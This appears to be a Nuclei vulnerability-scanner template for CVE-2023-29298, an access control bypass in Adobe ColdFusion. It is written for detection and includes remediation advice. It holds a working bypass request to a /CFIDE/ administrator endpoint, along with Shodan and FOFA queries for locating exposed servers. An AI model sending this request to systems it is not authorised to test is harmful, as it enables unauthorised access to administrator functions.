49 lines
1.8 KiB
YAML
49 lines
1.8 KiB
YAML
id: CVE-2023-29298
|
|
|
|
info:
|
|
name: Adobe ColdFusion - Access Control Bypass
|
|
author: rootxharsh,iamnoooob,DhiyaneshDK,pdresearch
|
|
severity: high
|
|
description: |
|
|
An attacker is able to access every CFM and CFC endpoint within the ColdFusion Administrator path /CFIDE/, of which there are 437 CFM files and 96 CFC files in a ColdFusion 2021 Update 6 install.
|
|
remediation: |
|
|
Apply the latest security patches or updates provided by Adobe to fix the access control bypass vulnerability.
|
|
reference:
|
|
- https://www.rapid7.com/blog/post/2023/07/11/cve-2023-29298-adobe-coldfusion-access-control-bypass/
|
|
- https://helpx.adobe.com/security/products/coldfusion/apsb23-40.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2023-29298
|
|
cwe-id: CWE-284,NVD-CWE-Other
|
|
epss-score: 0.75542
|
|
epss-percentile: 0.97829
|
|
cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: adobe
|
|
product: coldfusion
|
|
shodan-query: http.component:"Adobe ColdFusion"
|
|
fofa-query: app="Adobe-ColdFusion"
|
|
tags: cve,cve2023,adobe,auth-bypass,coldfusion,kev
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}//CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- ([0-9a-fA-F]{32},){2}[0-9a-fA-F]{32}
|
|
|
|
- type: dsl
|
|
dsl:
|
|
- contains(content_type, "text/html")
|
|
- status_code == 200
|
|
- len(trim_space(body)) == 106
|
|
condition: and
|
|
|
|
# digest: 490a004630440220340e2b5af29c3d672343f18fc799e2a7723682134e4a986053491e391d2d5f4c02207ede063725f1961b946572fb08708ff8ed42b3e00788fa49b7ab9ed13f215561:922c64590222798bb761d5b6d8e72950
|